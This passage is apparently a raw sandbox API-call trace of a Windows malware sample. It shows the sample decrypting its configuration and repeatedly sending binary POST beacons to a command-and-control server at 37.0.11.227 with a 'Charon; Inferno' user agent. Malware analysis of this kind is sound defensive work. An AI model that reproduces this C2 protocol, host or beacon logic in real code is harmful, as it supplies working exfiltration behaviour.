param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0214.948] GetProcessHeap () returned 0x690000 [0214.948] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0214.948] GetProcessHeap () returned 0x690000 [0214.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0214.949] send (s=0x51c, buf=0x6ad508*, len=242, flags=0) returned 242 [0214.949] send (s=0x51c, buf=0x6aba40*, len=159, flags=0) returned 159 [0214.949] GetProcessHeap () returned 0x690000 [0214.949] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0214.949] recv (in: s=0x51c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0215.033] GetProcessHeap () returned 0x690000 [0215.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0215.034] GetProcessHeap () returned 0x690000 [0215.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0215.034] GetProcessHeap () returned 0x690000 [0215.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0215.034] GetProcessHeap () returned 0x690000 [0215.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0215.035] closesocket (s=0x51c) returned 0 [0215.035] GetProcessHeap () returned 0x690000 [0215.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0215.036] GetProcessHeap () returned 0x690000 [0215.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0215.036] GetProcessHeap () returned 0x690000 [0215.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0215.037] GetProcessHeap () returned 0x690000 [0215.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0215.037] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x284) returned 0x51c [0215.057] Sleep (dwMilliseconds=0xea60) [0215.058] GetProcessHeap () returned 0x690000 [0215.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0215.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.060] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.071] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0215.079] GetProcessHeap () returned 0x690000 [0215.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0215.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.080] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0215.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.081] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.082] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.082] GetProcessHeap () returned 0x690000 [0215.082] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0215.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.090] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0215.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.092] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0215.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.093] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0215.093] GetProcessHeap () returned 0x690000 [0215.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0215.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.094] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0215.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.096] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0215.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.097] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0215.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.098] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0215.098] GetProcessHeap () returned 0x690000 [0215.098] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0215.098] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0215.099] GetProcessHeap () returned 0x690000 [0215.099] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0215.099] GetProcessHeap () returned 0x690000 [0215.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0215.100] GetProcessHeap () returned 0x690000 [0215.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0215.100] GetProcessHeap () returned 0x690000 [0215.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0215.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.101] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.112] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0215.120] GetProcessHeap () returned 0x690000 [0215.120] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0215.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.121] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0215.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.122] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.123] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.123] GetProcessHeap () returned 0x690000 [0215.124] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0215.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.125] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0215.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.126] CryptDestroyKey (hKey=0x69d628) returned 1 [0215.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.129] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0215.129] GetProcessHeap () returned 0x690000 [0215.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0215.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.130] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0215.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.132] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0215.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.132] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0215.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.133] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0215.133] GetProcessHeap () returned 0x690000 [0215.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0215.133] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0215.133] GetProcessHeap () returned 0x690000 [0215.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0215.133] socket (af=2, type=1, protocol=6) returned 0x520 [0215.134] connect (s=0x520, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0215.159] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0215.159] GetProcessHeap () returned 0x690000 [0215.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0215.159] GetProcessHeap () returned 0x690000 [0215.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0215.160] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0215.161] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0215.161] GetProcessHeap () returned 0x690000 [0215.161] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0215.161] GetProcessHeap () returned 0x690000 [0215.161] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0215.164] GetProcessHeap () returned 0x690000 [0215.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0215.164] GetProcessHeap () returned 0x690000 [0215.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0215.165] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0215.166] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0215.166] GetProcessHeap () returned 0x690000 [0215.166] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0215.166] GetProcessHeap () returned 0x690000 [0215.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0215.167] send (s=0x520, buf=0x6ab500*, len=242, flags=0) returned 242 [0215.168] send (s=0x520, buf=0x6aba40*, len=159, flags=0) returned 159 [0215.168] GetProcessHeap () returned 0x690000 [0215.168] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0215.168] recv (in: s=0x520, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0215.236] GetProcessHeap () returned 0x690000 [0215.236] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0215.237] GetProcessHeap () returned 0x690000 [0215.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0215.238] GetProcessHeap () returned 0x690000 [0215.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0215.238] GetProcessHeap () returned 0x690000 [0215.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0215.239] closesocket (s=0x520) returned 0 [0215.239] GetProcessHeap () returned 0x690000 [0215.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0215.239] GetProcessHeap () returned 0x690000 [0215.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0215.240] GetProcessHeap () returned 0x690000 [0215.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0215.241] GetProcessHeap () returned 0x690000 [0215.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0215.242] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x7a4) returned 0x520 [0215.243] Sleep (dwMilliseconds=0xea60) [0215.245] GetProcessHeap () returned 0x690000 [0215.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0215.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.246] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.253] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0215.261] GetProcessHeap () returned 0x690000 [0215.261] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0215.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.262] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0215.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.263] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.265] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.265] GetProcessHeap () returned 0x690000 [0215.265] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0215.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.266] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0215.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.268] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0215.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.269] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0215.269] GetProcessHeap () returned 0x690000 [0215.269] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0215.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.273] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0215.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.274] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0215.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.275] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0215.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.277] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0215.277] GetProcessHeap () returned 0x690000 [0215.277] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0215.277] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0215.277] GetProcessHeap () returned 0x690000 [0215.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0215.278] GetProcessHeap () returned 0x690000 [0215.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0215.278] GetProcessHeap () returned 0x690000 [0215.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0215.279] GetProcessHeap () returned 0x690000 [0215.279] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0215.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.280] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.286] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0215.292] GetProcessHeap () returned 0x690000 [0215.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0215.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.293] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0215.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.295] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.296] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.296] GetProcessHeap () returned 0x690000 [0215.297] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0215.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.298] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0215.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.300] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0215.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.301] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0215.301] GetProcessHeap () returned 0x690000 [0215.301] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0215.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.302] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0215.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.303] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0215.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.304] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0215.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.305] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0215.305] GetProcessHeap () returned 0x690000 [0215.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0215.305] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0215.305] GetProcessHeap () returned 0x690000 [0215.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0215.306] socket (af=2, type=1, protocol=6) returned 0x524 [0215.306] connect (s=0x524, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0215.333] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0215.333] GetProcessHeap () returned 0x690000 [0215.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0215.334] GetProcessHeap () returned 0x690000 [0215.334] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0215.334] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0215.335] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0215.335] GetProcessHeap () returned 0x690000 [0215.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0215.335] GetProcessHeap () returned 0x690000 [0215.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0215.336] GetProcessHeap () returned 0x690000 [0215.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0215.336] GetProcessHeap () returned 0x690000 [0215.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0215.337] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0215.337] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0215.338] GetProcessHeap () returned 0x690000 [0215.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0215.338] GetProcessHeap () returned 0x690000 [0215.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0215.338] send (s=0x524, buf=0x6ab500*, len=242, flags=0) returned 242 [0215.338] send (s=0x524, buf=0x6aba40*, len=159, flags=0) returned 159 [0215.339] GetProcessHeap () returned 0x690000 [0215.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0215.339] recv (in: s=0x524, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0215.410] GetProcessHeap () returned 0x690000 [0215.411] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0215.411] GetProcessHeap () returned 0x690000 [0215.411] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0215.411] GetProcessHeap () returned 0x690000 [0215.411] HeapFree (in: 